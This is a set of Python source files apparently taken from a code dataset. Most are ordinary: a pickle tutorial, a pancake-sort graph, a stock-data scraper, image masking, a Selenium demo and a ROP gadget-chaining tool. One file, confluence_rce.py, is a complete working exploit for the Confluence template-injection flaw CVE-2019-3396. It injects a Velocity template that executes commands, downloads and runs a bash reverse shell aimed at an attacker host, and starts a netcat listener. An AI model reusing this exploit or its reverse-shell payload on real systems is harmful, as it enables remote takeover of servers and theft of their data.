payload_insn.dst and \\\n g.instructions[0].src != payload_insn.src:\n debug(\"Case 2: same dst, diff src\")\n debug(\"Target gadget:\")\n debug(g)\n debug(\"Objective: mov %s to %s\" % (payload_insn.src,\n g.instructions[0].src))\n if is_movable(payload_insn.src, g.instructions[0].src,\n payload_insn,\n mov_gadget_dict['register_move'],\n move_mapping,\n gadget_chain,\n visited=[]):\n gadget_chain.append(g)\n debug(colored(\"✓ Chain found\", 'green'))\n return gadget_chain\n # Case 3\n for g in mov_gadget_dict[chain_type]:\n if g.instructions[0].dst != payload_insn.dst and \\\n g.instructions[0].src == payload_insn.src:\n debug(\"Case 3: diff dst, same src\")\n debug(\"Target gadget:\")\n debug(g)\n debug(\"Objective: mov %s to %s\" % (payload_insn.dst,\n g.instructions[0].dst))\n if is_movable(payload_insn.dst, g.instructions[0].dst,\n payload_insn,\n mov_gadget_dict['register_move'],\n move_mapping,\n gadget_chain,\n visited=[]):\n gadget_chain.append(g)\n debug(colored(\"✓ Chain found\", 'green'))\n return gadget_chain\n # Case 4\n for g in mov_gadget_dict[chain_type]:\n if g.instructions[0].dst != payload_insn.dst and \\\n g.instructions[0].src != payload_insn.src:\n debug(\"Case 4: diff dst, diff src\")\n debug(\"Target gadget:\")\n debug(g)\n debug(\"Objective 1: mov %s to %s\" % (payload_insn.dst,\n g.instructions[0].dst))\n if is_movable(payload_insn.dst, g.instructions[0].dst,\n payload_insn,\n mov_gadget_dict['register_move'],\n move_mapping,\n gadget_chain,\n visited=[]):\n debug(\"Objective 2: mov %s to %s\" % (payload_insn.src,\n g.instructions[0].src))\n if is_movable(payload_insn.src, g.instructions[0].src,\n payload_insn,\n mov_gadget_dict['register_move'],\n move_mapping,\n gadget_chain,\n visited=[]):\n gadget_chain.append(g)\n debug(colored(\"✓ Chain found\", 'green'))\n return gadget_chain\n return\n\n\ndef find_chain(payload_insn, mov_gadget_dict, move_mapping):\n \"\"\"\n Search in a dictionnary of MOV gadgets for a gadget (or gadget chain) that\n matches a given payload instruction.\n\n Args:\n payload_insn: String representing the payload instruction.\n\n mov_gadget_dict: Dict containing lists of diff mov gadgets available.\n\n move_mapping: Dict representing the possible movements.\n\n Returns:\n An ordered list of gadgets constituting the chain.\n \"\"\"\n gadget_chain = []\n\n if payload_insn.mnemonic in ['MOV r/m32,r32', 'MOV r/m32,imm32',\n 'MOV imm32,r32']:\n gadget_chain = solve_chain('memory_write', payload_insn,\n mov_gadget_dict, move_mapping)\n\n if payload_insn.mnemonic in ['MOV r32,r/m32', 'MOV r32,imm32']:\n gadget_chain = solve_chain('memory_read', payload_insn,\n mov_gadget_dict, move_mapping)\n\n if not gadget_chain:\n debug(\"%s\\n\" % colored(\"✘ Chain not found\", 'red'))\n\n return gadget_chain\n\n\ndef print_rule_validation(glist):\n \"\"\" Prints the rule check detail for every gadget in a list \"\"\"\n def _check_ruleset(g):\n if g.instructions[0].src == 'esp' or g.instructions[0].dst == 'esp':\n print(colored('✘ forbidden access to/from ESP', 'red'))\n return False\n if g.instructions[len(g.instructions) - 1].label != 'ret;':\n print(colored('✘ ret to address', 'red'))\n return False\n for i in g.instructions[1:]:\n if i.mnemonic == 'LEAVE':\n print(colored('✘ leave instruction', 'red'))\n return False\n if i.mnemonic == 'CALL':\n print(colored('✘ call instruction', 'red'))\n return False\n if i.dst == g.instructions[0].dst:\n print(colored('✘ conflicting instructions', 'red'))\n return False\n if i.dst == 'esp':\n print(colored('✘ write on ESP', 'red'))\n return False\n print(colored('✓ potential gadget', 'green'))\n return True\n\n for g in glist:\n _check_ruleset(g)\n print(g)\n\n\ndef print_chain(gadget_chain):\n \"\"\" Prints all the gadgets from a given chain \"\"\"\n for g in gadget_chain:\n print(g)\n\n\ndef print_stack(gadget_chain, payload_insn):\n \"\"\" Prepare and prints a visualization of the stack holding the payload\"\"\"\n CELL_WIDTH = 58\n ADDRESS_LENGTH = 10\n\n def _stack_cell(size, value, desc):\n \"\"\" Prints a stack cell with a given value and description \"\"\"\n print(\"|\" + \" \"*size + \"<\"+str(value)+\">\" + \" \"*(size-1) + \"| \" +\n colored(desc, 'yellow'))\n\n def _stack_separator(size=CELL_WIDTH):\n \"\"\" Prints a separator between two stack cells \"\"\"\n print(\"+\" + \"=\"*int(size/2) + \"+\")\n\n def _address_filling(value):\n \"\"\" Reformat a given string to a 8 char long hexadecimal string \"\"\"\n if len(value) != ADDRESS_LENGTH:\n return value[:2] + \"0\"*(ADDRESS_LENGTH-len(value)) + value[2:]\n return value\n\n def _prepare_stack(g):\n \"\"\" Inserts a placeholder value to be popped by subsequent gadgets \"\"\"\n label = colored(\"value to be popped\", \"cyan\")\n value = None\n if payload_insn.mnemonic in ['MOV r/m32,r32', 'MOV imm32,r32']:\n value = _address_filling(payload_insn.dst)\n elif payload_insn.mnemonic in ['MOV r/m32,imm32', 'MOV r32,imm32',\n 'MOV r32,r/m32']:\n value = _address_filling(payload_insn.src)\n if g.instructions[0].mnemonic == 'POP r32':\n _stack_cell(len(str(g.address)), value, label)\n _stack_separator()\n for insn in g.instructions[1:]:\n if insn.mnemonic == 'POP r32':\n _stack_cell(len(str(g.address)), \"0x42424242\", label)\n _stack_separator()\n\n print(\" \"*13 + \"STACK\")\n _stack_separator()\n for index, g in enumerate(gadget_chain, start=1):\n label = \"address of G\"+str(index)\n value = _address_filling(hex(g.address))\n _stack_cell(len(str(g.address)), value, label)\n _stack_separator()\n _prepare_stack(g)\n\n\ndef print_statistics(total, supported, assumed):\n \"\"\" Prints approximative stats of the program's results \"\"\"\n print(\"Total instructions: {}\".format(colored(total, 'yellow')))\n print(\"Supported: {} [{}%] \"\n \"- All assumptions\".format(colored(supported, 'green'),\n int((supported/total)*100)))\n print(\"Supported: {} [{}%] \"\n \"- No offsets\".format(colored(abs(supported-assumed), 'green'),\n int((abs(supported-assumed)/total)*100)))\n print(\"Not supported: {} [{}%]\".format(colored(total-supported, 'red'),\n int(((total-supported)/total)*100)))\n\n\ndef debug(msg):\n if DEBUG:\n print(str(msg))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='')\n parser.add_argument(\"target\", help=\"path to target binary\")\n parser.add_argument(\"object\", help=\"path to payload object file\")\n parser.add_argument(\"-D\", \"--DEBUG\", action=\"store_true\",\n help=\"enable detailed output\")\n\n args = parser.parse_args()\n target = args.target\n obj = args.object\n\n objdump = Disasm.dump_object(obj)\n opcode = Disasm.extract_opcode(objdump)\n\n X86_CODE32 = bytes.fromhex(opcode)\n all_tests = (\n (CS_ARCH_X86, CS_MODE_32, X86_CODE32, \"X86 32 (Intel syntax)\", 0),\n )\n\n ex = Extractor.Extractor(options, target)\n dis = Disasm.Disasm(all_tests)\n\n pop_gadgets = search_pop_gadgets(ex)\n push_gadgets = search_push_gadgets(ex)\n payload_insns = search_payload_insn(dis)\n\n if args.DEBUG:\n DEBUG = True\n\n gadgets_lists = {\n 'memory_write': sorted(ex.search_gadgets('mov [e??], e??;'),\n key=lambda gadget: len(gadget.instructions)),\n 'memory_read': sorted(ex.search_gadgets('mov e??, [e??]'),\n key=lambda gadget: len(gadget.instructions)),\n 'register_move': sorted(ex.search_gadgets('mov e??, e??'),\n key=lambda gadget: len(gadget.instructions)),\n }\n\n # Test cases with manual instructions used to find gadget chains\n debug_instructions = [\n Instruction('mov ecx, ebp', 0x12345678, 'MOV r/m32,r32',\n 'ecx', 'ebp'),\n Instruction('mov eap, ecx', 0x12345678, 'MOV r/m32,r32',\n 'eax', 'ecx'),\n Instruction('mov dword ptr [edi], eax', 0x12345678, 'MOV r/m32,r32',\n 'edi', 'eax'),\n Instruction('mov dword ptr [ebx], ecx', 0x12345678, 'MOV r/m32,r32',\n 'ebx', 'ecx'),\n Instruction('mov dword ptr [edi], ecx', 0x12345678, 'MOV r/m32,r32',\n 'edi', 'ecx'),\n Instruction('mov dword ptr eax, [edx]', 0x12345678, 'MOV r32,r/m32',\n 'eax', 'edx'),\n Instruction('mov dword ptr ebx, [ecx]', 0x12345678, 'MOV r32,r/m32',\n 'ebx', 'ecx'),\n Instruction('mov dword ptr [eax], 0x1', 0x12345678, 'MOV r/m32,imm32',\n 'eax', '0x1'),\n Instruction('mov dword ptr [eax], ds:0x0', 0x12345678, 'MOV r/m32,imm32',\n 'eax', '0x0'),\n Instruction('mov eax, 0x8000000', 0x12345678, 'MOV r/m32,imm32',\n 'eax', '0x8000000'),\n ]\n\n reglist = ['eax', 'ebx', 'ecx', 'edx', 'ebp', 'esp', 'edi', 'esi']\n controlled_regs = []\n\n if DEBUG:\n for gtype, glist in gadgets_lists.items():\n print(\"DEBUG: \" + gtype)\n print(\"-\" * 80)\n print_rule_validation(glist)\n for reg in pop_gadgets:\n if reg not in controlled_regs:\n controlled_regs.append(reg.instructions[0].dst)\n\n missing_regs = list(set(reglist) - set(controlled_regs))\n\n for gtype in gadgets_lists.keys():\n gadgets_lists[gtype] = [\n g for g in gadgets_lists[gtype]\n if check_gadget_validity(g, controlled_regs)\n ]\n\n print(\"Dumping target payload <%s>:\" % obj)\n print(\"-\" * 80)\n print(objdump)\n\n print(\"Pop gadgets:\")\n print(\"-\" * 80)\n for g in pop_gadgets:\n print(g)\n\n\n print(\"Register move gadgets: \")\n print(\"-\" * 80)\n for g in gadgets_lists['register_move']:\n print(g)\n\n print(\"Memory read gadgets: \")\n print(\"-\" * 80)\n for g in gadgets_lists['memory_read']:\n print(g)\n\n print(\"Memory write gadgets: \")\n print(\"-\" * 80)\n for g in gadgets_lists['memory_write']:\n print(g)\n\n print(\"Controlled registers: \\n\\t%s\" %\n colored(' '.join(str(cr) for cr in controlled_regs), 'green'))\n if missing_regs:\n print(\"Missing: \\n\\t%s\" %\n colored(' '.join(str(mr) for mr in missing_regs), 'red'))\n\n regmove_map = map_possible_movements('register_move', gadgets_lists)\n memwrite_map = map_possible_movements('memory_write', gadgets_lists)\n memread_map = map_possible_movements('memory_read', gadgets_lists)\n\n print(\"Possible reg mov:\")\n print(\"\\tsrc: dst (green = direct mov, blue = chained)\")\n for reg in regmove_map.keys():\n if regmove_map[reg][\"direct\"]:\n print(\"\\t%s: %s %s %s\" % (\n reg,\n colored(' '.join(\n str(m) for m in regmove_map[reg][\"direct\"]), 'green'),\n colored(' '.join(\n str(m) for m in regmove_map[reg][\"chained\"]), 'cyan'),\n colored(' '.join(\n str(m) for m in regmove_map[reg][\"missing\"]), 'red'),\n ))\n\n print(\"Possible memory write: \")\n for reg in memwrite_map.keys():\n if memwrite_map[reg][\"direct\"]:\n print(\"\\t%s: %s %s\" % (\n reg,\n colored(' '.join(\n str(m) for m in memwrite_map[reg][\"direct\"]), 'green'),\n colored(' '.join(\n str(m) for m in memwrite_map[reg][\"missing\"]), 'red'),\n ))\n\n print(\"Possible memory read: \")\n for reg in memread_map.keys():\n if memread_map[reg][\"direct\"]:\n print(\"\\t%s: %s %s\" % (\n reg,\n colored(' '.join(\n str(m) for m in memread_map[reg][\"direct\"]), 'green'),\n colored(' '.join(\n str(m) for m in memread_map[reg][\"missing\"]), 'red'),\n ))\n print()\n\n # Search a gadget chain for each test instruction in our list\n supported_insns = 0\n assumed_insns = 0\n for insn in payload_insns:\n print(\"-\"*80)\n print()\n print(colored(\"Target: \"+insn.label, \"yellow\"))\n if is_supported(insn):\n if insn.src_offset or insn.dst_offset:\n assumed_insns += 1\n gchain = find_chain(insn, gadgets_lists, regmove_map)\n debug(insn.src)\n debug(insn.dst)\n debug(insn.mnemonic)\n if gchain:\n supported_insns += 1\n print_chain(gchain)\n print_stack(gchain, insn)\n else:\n print(colored(\"No chain found\", \"red\"))\n print()\n print_statistics(len(payload_insns), supported_insns, assumed_insns)\n\n if DEBUG:\n for insn in debug_instructions:\n print(\"-\"*80)\n print()\n gchain = find_chain(insn, gadgets_lists, regmove_map)\n print(colored(\"Target: \"+insn.label, \"yellow\"))\n print(insn.src)\n print(insn.dst)\n debug(insn.mnemonic)\n if gchain:\n print_chain(gchain)\n print_stack(gchain, insn)\n else:\n print(colored(\"No chain found\", \"red\"))\n","sub_path":"Matcher.py","file_name":"Matcher.py","file_ext":"py","file_size_in_byte":27055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"521295063","text":"import pickle\r\n\r\n#main\r\ndef main():\r\n again = 'y' #Control loop repetition\r\n\r\n #Open file for binary writing\r\n output_file = open('info.dat', 'wb')\r\n\r\n #Get data until user want to stop\r\n while again.lower() == 'y':\r\n #Get data about a person and save it\r\n save_data(output_file)\r\n\r\n #Does the user want to enter more data?\r\n again = input('Enter more data? (y/n): ')\r\n\r\n #Close file\r\n output_file.close()\r\n\r\n#Save_data func gets data about a person, store in dictionary\r\n#then pickles the dictionary to the specified file\r\ndef save_data(file):\r\n #Create empty dict\r\n person = {}\r\n\r\n #Get data for person and store\r\n person['name'] = input('Name: ')\r\n person['age'] = input('Age: ')\r\n person['weight'] = float(input('Weight: '))\r\n\r\n #pickle the dictionary\r\n pickle.dump(person, file)\r\n\r\nmain() \r\n","sub_path":"Chap 9/pickle_objects.py","file_name":"pickle_objects.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"548863021","text":"from functools import reduce\nimport unittest\nimport graph_tool.all as gt\nfrom math import factorial\nfrom numpy import sqrt\nfrom itertools import permutations\n\nn = 6\npaths = set([])\ng = gt.Graph()\nvl = g.new_vertex_property(\"vector\")\nlv = dict([])\ntc = unittest.TestCase('__init__')\n\ndef pancakesort(lst):\n def flip(end):\n data_tmp = tuple(lst)\n lst[:end] = lst[:end][::-1]\n path = (data_tmp, tuple(lst))\n if path in paths:\n raise ValueError('already known path')\n else:\n paths.add(path)\n\n if len(lst) < 2:\n return lst\n \n for i in range(len(lst), 1, -1):\n \n max_num_pos = 0\n for a in range(i):\n if lst[a] > lst[max_num_pos]:\n max_num_pos = a\n\n if max_num_pos == i-1:\n continue\n \n if max_num_pos != 0:\n flip(max_num_pos + 1);\n \n flip(i);\n \n return lst\n\nfor v, l in zip(g.add_vertex(factorial(n)), permutations(range(n))):\n vl[v] = l\n lv[l] = v\n try:\n tc.assertEqual(pancakesort(list(l)), sorted(list(l)))\n except ValueError:\n pass\n\nfor s, t in paths:\n g.add_edge(lv[s], lv[t])\n\n#pos = gt.arf_layout(g, max_iter=0)\n#gt.graph_draw(g, pos=pos, output=\"pancakes0-arf.pdf\", vertex_text=vl, vertex_font_size=12, output_size=(3000, 3000))\n\n#pos = gt.radial_tree_layout(g, g.vertex(0))\n#gt.graph_draw(g, pos=pos, output=\"pancakes0-radial.pdf\", vertex_text=vl, vertex_font_size=12, output_size=(3000, 3000))\n\n#pos = gt.fruchterman_reingold_layout(g, n_iter=1000)\n#gt.graph_draw(g, pos=pos, output=\"pancakes0-fr.pdf\", vertex_text=vl, vertex_font_size=12, output_size=(3000, 3000))\n\n#pos = gt.sfdp_layout(g)\n#gt.graph_draw(g, pos=pos, output=\"pancakes0-sfdp.pdf\", vertex_text=vl, vertex_font_size=12, output_size=(3000, 3000))\n\ndeg = g.degree_property_map(\"in\")\ndeg.a = 4 * (sqrt(deg.a) * 0.5 + 0.4)\nebet = gt.betweenness(g)[1]\nebet.a /= ebet.a.max() / 10.\neorder = ebet.copy()\neorder.a *= -1\npos = gt.sfdp_layout(g)\ncontrol = g.new_edge_property(\"vector\")\nfor e in g.edges():\n d = sqrt(sum((pos[e.source()].a - pos[e.target()].a) ** 2)) / 5\n control[e] = [0.3, d, 0.7, d]\ngt.graph_draw(g, pos=pos, vertex_size=deg, vertex_fill_color=deg, vorder=deg,\nedge_color=ebet, eorder=eorder, edge_pen_width=ebet,\nedge_control_points=control, # some curvy edges\noutput=\"graph-draw.pdf\")\n","sub_path":"pancakes0.py","file_name":"pancakes0.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"396102438","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*- ####################################################################################\n#▄█▄ ████▄ ▄ ▄████ █ ▄ ▄███▄ ▄ ▄█▄ ▄███▄ █▄▄▄▄ ▄█▄ ▄███▄ #\n#█▀ ▀▄ █ █ █ █▀ ▀ █ █ █▀ ▀ █ █▀ ▀▄ █▀ ▀ █ ▄▀ █▀ ▀▄ █▀ ▀ #\n#█ ▀ █ █ ██ █ █▀▀ █ █ █ ██▄▄ ██ █ █ ▀ ██▄▄ █▀▀▌ █ ▀ ██▄▄ #\n#█▄ ▄▀ ▀████ █ █ █ █ ███▄ █ █ █▄ ▄▀ █ █ █ █▄ ▄▀ █▄ ▄▀ █ █ █▄ ▄▀ █▄ ▄▀ #\n#▀███▀ █ █ █ █ ▀ █▄ ▄█ ▀███▀ █ █ █ ▀███▀ ▀███▀ █ ▀███▀ ▀███▀ #\n# █ ██ ▀ ▀▀▀ █ ██ ▀ #\n# confluence_rce .py - nighter@nighter.se [CVE-2019-3396] #\n# #\n# DATE #\n# 03/04/2019 #\n# #\n# DESCRIPTION #\n# The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 #\n# (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), #\n# from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 #\n# (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code #\n# execution on a Confluence Server or Data Center instance via server-side template injection. #\n# #\n# #\n#############################################################################################################\n\nimport requests\nimport time\nimport sys\nimport os\n\nfrom multiprocessing import Process\n\n\ndef create_payload():\n\n payload = '''#set ($e=\"exp\")\n#set ($a=$e.getClass().forName(\"java.lang.Runtime\").getMethod(\"getRuntime\",null).invoke(null,null).exec($cmd))\n#set ($input=$e.getClass().forName(\"java.lang.Process\").getMethod(\"getInputStream\").invoke($a))\n#set($sc = $e.getClass().forName(\"java.util.Scanner\"))\n#set($constructor = $sc.getDeclaredConstructor($e.getClass().forName(\"java.io.InputStream\")))\n#set($scan=$constructor.newInstance($input).useDelimiter(\"\\\\A\"))\n#if($scan.hasNext())\n $scan.next()\n#end'''\n\n with open('/tmp/payload.vm', 'w') as file:\n file.write(payload)\n\n payload = '''#!/bin/bash\nbash -i >& /dev/tcp/%s/%s 0>&1''' % (LHOST, LPORT)\n\n with open('/tmp/payload.sh', 'w') as file:\n file.write(payload)\n\n\ndef start_ftp_server():\n os.chdir('/tmp')\n os.system(\"python3 -m pyftpdlib -p 2121 > /dev/null 2>&1\")\n\n\ndef rce_cmd(command):\n\n session = requests.session()\n url = \"%s/rest/tinymce/1/macro/preview\" % URL\n headers = {\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\",\n \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Connection\": \"close\",\n \"Referer\": \"%s/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&\" % url,\n \"Content-Type\": \"application/json; charset=utf-8\"}\n\n json_payload = {\"contentId\": \"12345\", \"macro\": {\"body\": \"\", \"name\": \"widget\",\n \"params\": {\"_template\": \"ftp://%s:2121/payload.vm\" % LHOST, \"cmd\": \"%s\" % command,\n \"height\": \"200\",\n \"url\": \"http://www.dailymotion.com/video/xcpa64\",\n \"width\": \"300\"}}}\n\n r = session.post(url, headers=headers, json=json_payload)\n\n\ndef exploit():\n\n time.sleep(3)\n print('[+] Exploit')\n\n command = '''curl ftp://%s:2121/payload.sh -o /tmp/payload.sh''' % LHOST\n rce_cmd(command)\n\n command = '''chmod +x /tmp/payload.sh'''\n rce_cmd(command)\n\n command = '''/tmp/payload.sh'''\n rce_cmd(command)\n\n\nif __name__ == '__main__':\n\n if len(sys.argv) != 4:\n print (\"\"\"\n▄█▄ ████▄ ▄ ▄████ █ ▄ ▄███▄ ▄ ▄█▄ ▄███▄ █▄▄▄▄ ▄█▄ ▄███▄ \n█▀ ▀▄ █ █ █ █▀ ▀ █ █ █▀ ▀ █ █▀ ▀▄ █▀ ▀ █ ▄▀ █▀ ▀▄ █▀ ▀ \n█ ▀ █ █ ██ █ █▀▀ █ █ █ ██▄▄ ██ █ █ ▀ ██▄▄ █▀▀▌ █ ▀ ██▄▄ \n█▄ ▄▀ ▀████ █ █ █ █ ███▄ █ █ █▄ ▄▀ █ █ █ █▄ ▄▀ █▄ ▄▀ █ █ █▄ ▄▀ █▄ ▄▀ \n▀███▀ █ █ █ █ ▀ █▄ ▄█ ▀███▀ █ █ █ ▀███▀ ▀███▀ █ ▀███▀ ▀███▀ \n █ ██ ▀ ▀▀▀ █ ██ ▀ \n[nighter@nighter.se]\n \"\"\")\n print(\"Usage: %s \" % (sys.argv[0]))\n print(\"EXAMPLE: ./confluence_rce.py 'http://localhost:8090' 10.10.14.24 1337\\n\")\n sys.exit(0)\n\n URL = sys.argv[1]\n LHOST = sys.argv[2]\n LPORT = sys.argv[3]\n\n create_payload()\n p = Process(target=start_ftp_server)\n p.start()\n\n # Exploit windows\n p = Process(target=exploit)\n p.start()\n\n print(\"[+] Netcat = %s\" % LPORT)\n os.system('nc -lnvp %s' % LPORT)","sub_path":"CVE-2019-3396_confluence_rce/confluence_rce.py","file_name":"confluence_rce.py","file_ext":"py","file_size_in_byte":6661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"171459918","text":"import sys\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QAxContainer import *\nfrom PyQt5.QtCore import *\nimport time\nimport sqlite3\nimport pandas as pd\n\nTR_REQ_TIME_INTERVAL = 0.5\n\n\nclass Kiwoom(QAxWidget):\n def __init__(self):\n super().__init__()\n self._create_kiwoom_instance()\n self._set_signal_slots()\n\n def _create_kiwoom_instance(self):\n self.setControl(\"KHOPENAPI.KHOpenAPICtrl.1\")\n\n def _set_signal_slots(self):\n self.OnEventConnect.connect(self._event_connect)\n self.OnReceiveTrData.connect(self._receive_tr_data)\n\n def comm_connect(self):\n self.dynamicCall(\"CommConnect()\")\n self.login_event_loop = QEventLoop()\n self.login_event_loop.exec_()\n\n def _event_connect(self, err_code):\n if err_code == 0:\n print(\"connected\")\n else:\n print(\"disconnected\")\n\n self.login_event_loop.exit()\n\n def set_input_value(self, id, value):\n self.dynamicCall(\"SetInputValue(QString, QString)\", id, value)\n\n def comm_rq_data(self, rqname, trcode, next, screen_no):\n self.dynamicCall(\"CommRqData(QString, QString, int, QString\", rqname, trcode, next, screen_no)\n self.tr_event_loop = QEventLoop()\n self.tr_event_loop.exec_()\n\n def _comm_get_data(self, code, real_type, field_name, index, item_name):\n ret = self.dynamicCall(\"CommGetData(QString, QString, QString, int, QString\", code,\n real_type, field_name, index, item_name)\n return ret.strip()\n\n def _get_repeat_cnt(self, trcode, rqname):\n ret = self.dynamicCall(\"GetRepeatCnt(QString, QString)\", trcode, rqname)\n return ret\n\n def _receive_tr_data(self, screen_no, rqname, trcode, record_name, next, unused1, unused2, unused3, unused4):\n if next == '2':\n self.remained_data = True\n else:\n self.remained_data = False\n\n if rqname == \"req_1\":\n self._opt20005(rqname, trcode)\n\n try:\n self.tr_event_loop.exit()\n except AttributeError:\n pass\n\n def _opt20005(self, rqname, trcode):\n data_cnt = self._get_repeat_cnt(trcode, rqname)\n for i in range(data_cnt):\n price = self._comm_get_data(trcode, \"\", rqname, i, \"현재가\")\n date = self._comm_get_data(trcode, \"\", rqname, i, \"체결시간\")\n volume = self._comm_get_data(trcode, \"\", rqname, i, \"거래량\")\n open = self._comm_get_data(trcode, \"\", rqname, i, \"시가\")\n high = self._comm_get_data(trcode, \"\", rqname, i, \"고가\")\n low = self._comm_get_data(trcode, \"\", rqname, i, \"저가\")\n self.data['date'].append(date)\n self.data['price'].append(price)\n self.data['volume'].append(volume)\n self.data['open'].append(open)\n self.data['high'].append(high)\n self.data['low'].append(low)\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n kiwoom = Kiwoom()\n kiwoom.comm_connect()\n\n kiwoom.data = {'date': [], 'price': [], 'volume': [], 'open': [], 'high': [], 'low': []}\n\n req_count = 0\n con = sqlite3.connect(\"option 4월물.db\")\n cur = con.cursor()\n cur.execute('SELECT \"date\" FROM \"KOSPI200\"')\n dbline = cur.fetchone()\n\n print(\"now processing KOSPI 200\")\n kiwoom.set_input_value(\"업종코드\", \"201\")\n kiwoom.set_input_value(\"틱범위\", \"1\")\n kiwoom.comm_rq_data(\"req_1\", \"opt20005\", 0, \"0101\")\n req_count += 1\n print(\"Request count : \", req_count)\n while kiwoom.remained_data == True:\n time.sleep(TR_REQ_TIME_INTERVAL)\n kiwoom.set_input_value(\"업종코드\", \"201\")\n kiwoom.set_input_value(\"틱범위\", \"1\")\n kiwoom.comm_rq_data(\"req_1\", \"opt20005\", 2, \"0101\")\n req_count += 1\n print(\"Request count : \", req_count)\n if req_count == 99:\n time.sleep(30)\n if int(kiwoom.data['date'][-1]) <= int(dbline[0]):\n line_num = kiwoom.data['date'].index(dbline[0])\n del kiwoom.data['date'][line_num:]\n del kiwoom.data['price'][line_num:]\n del kiwoom.data['volume'][line_num:]\n del kiwoom.data['open'][line_num:]\n del kiwoom.data['high'][line_num:]\n del kiwoom.data['low'][line_num:]\n break\n\n df = pd.DataFrame(kiwoom.data, columns=['date', 'open', 'high', 'low', 'price', 'volume'])\n df.to_sql('KOSPI200', con, if_exists='append', index=False)\n con.commit()\n con.close()\n conn = sqlite3.connect(\"option 4월물.db\")\n df2 = pd.read_sql('select * from \"KOSPI200\" ORDER BY \"date\" desc', con=conn)\n df2.to_sql('KOSPI200', conn, if_exists='replace', index=False)\n conn.commit()\n conn.close()\n","sub_path":"opt kospi200 code add.py","file_name":"opt kospi200 code add.py","file_ext":"py","file_size_in_byte":4757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"231604356","text":"# coding:utf-8\r\n\r\nimport cv2\r\nimport numpy as np\r\nimport image_funcs as imf\r\nfrom k_means import run_kmeans\r\n\r\noriginal_path = \"Images/black_board.JPG\" # \"Images/otaku_green.png\"\r\nnew_path = \"Images/black_board.png\"\r\n\r\n\r\ndef print_image(str, image):\r\n print(str + \" info: \" + str(image.shape)) # 配列の次元を取得\r\n cv2.imshow(str, image)\r\n cv2.waitKey()\r\n\r\n\r\n# 引数については-> http://opencv.jp/opencv-2.1/cpp/reading_and_writing_images_and_video.html\r\nimage = cv2.imread(original_path)\r\nimage = imf.scale(image, 500, 500)\r\nimage = imf.cv2pil(image)\r\nimage = list(image.convert('RGB').getdata())\r\nimage = imf.pil2cv(run_kmeans(image, 8))\r\nprint_image(\"raw_image_info\", image)\r\n\r\ngreen_min = np.array([110, 110, 100], np.uint8) # ([0, 100, 0], np.uint8) # 純色の緑に黒を追加したような暗い黒\r\ngreen_max = np.array([140, 140, 150], np.uint8) # ([30, 130, 30], np.uint8) # R,B が少し加わり、緑の彩度が上がった明るい緑\r\n\r\nthreshold_otaku = cv2.bitwise_not(cv2.inRange(image, green_min, green_max)) # 二値化して黒白反転 二値化��たので配列の次元が二次元になる\r\nprint_image(\"threshold_otaku\", threshold_otaku)\r\n\r\nmask = cv2.cvtColor(threshold_otaku, cv2.COLOR_GRAY2BGR) # 二値化して二次元になった画像をBGRに変換してまた三次元にする\r\nprint_image(\"otalu_mask\", mask)\r\n\r\nnew_image = cv2.addWeighted(image, 1, mask, 1, 0)\r\n\r\nprint_image(\"new_otaku\", new_image)\r\n\r\ncv2.imwrite(new_path, new_image)\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"34651308","text":"from selenium import webdriver\n\ndriver_path = r'/home/hushengquan/下载/chromedriver'\ndriver = webdriver.Chrome(executable_path=driver_path)\ndriver.get('https://www.baidu.com')\n\ndriver.execute_script('window.open(\"https://www.douban.com/\")') # 在原有的页面另打开一个页面\nprint(driver.current_url)\n\ndriver.switch_to_window(driver.window_handles[1])\nprint(driver.current_url)\n\n\n# 虽然在窗口中切换到了新的页面,但是driver中还是没有切换\n# 如果想要在代码中切换到新的页面,并且做一些爬虫\n# 那么应该使用driver.switch_to_window来切换到指定窗口\n# 从driver.window_handlers中取出具体第几个窗口\n# driver.window_handlers是一个列表,里面装的都是窗口句柄\n# 它会按照打开页面的顺序来存储窗口的句柄\n","sub_path":"selenium/demo62-selenium打开多窗口和切换窗口.py","file_name":"demo62-selenium打开多窗口和切换窗口.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"351832254","text":"def is_same_list(numbers):\n result = True\n key_number = numbers[0]\n for i in range(1, len(numbers)):\n if key_number != numbers[i]:\n result = False\n break\n return result\n\ndef make_new_list(numbers, max_index):\n for i in range(len(numbers)):\n numbers[i] += 1\n numbers[max_index] -= 1\n return numbers\n\nn = int(input())\nnumbers = []\nfor i in range(n):\n numbers.append(int(input()))\nans = 0\nwhile not is_same_list(numbers):\n numbers = make_new_list(numbers, numbers.index(max(numbers)))\n ans += 1\nprint(ans)","sub_path":"python/test/mr/q4.py","file_name":"q4.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"297726640","text":"import time\nimport numpy as np\nimport cv2\nfrom glob import glob\nfrom tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint, 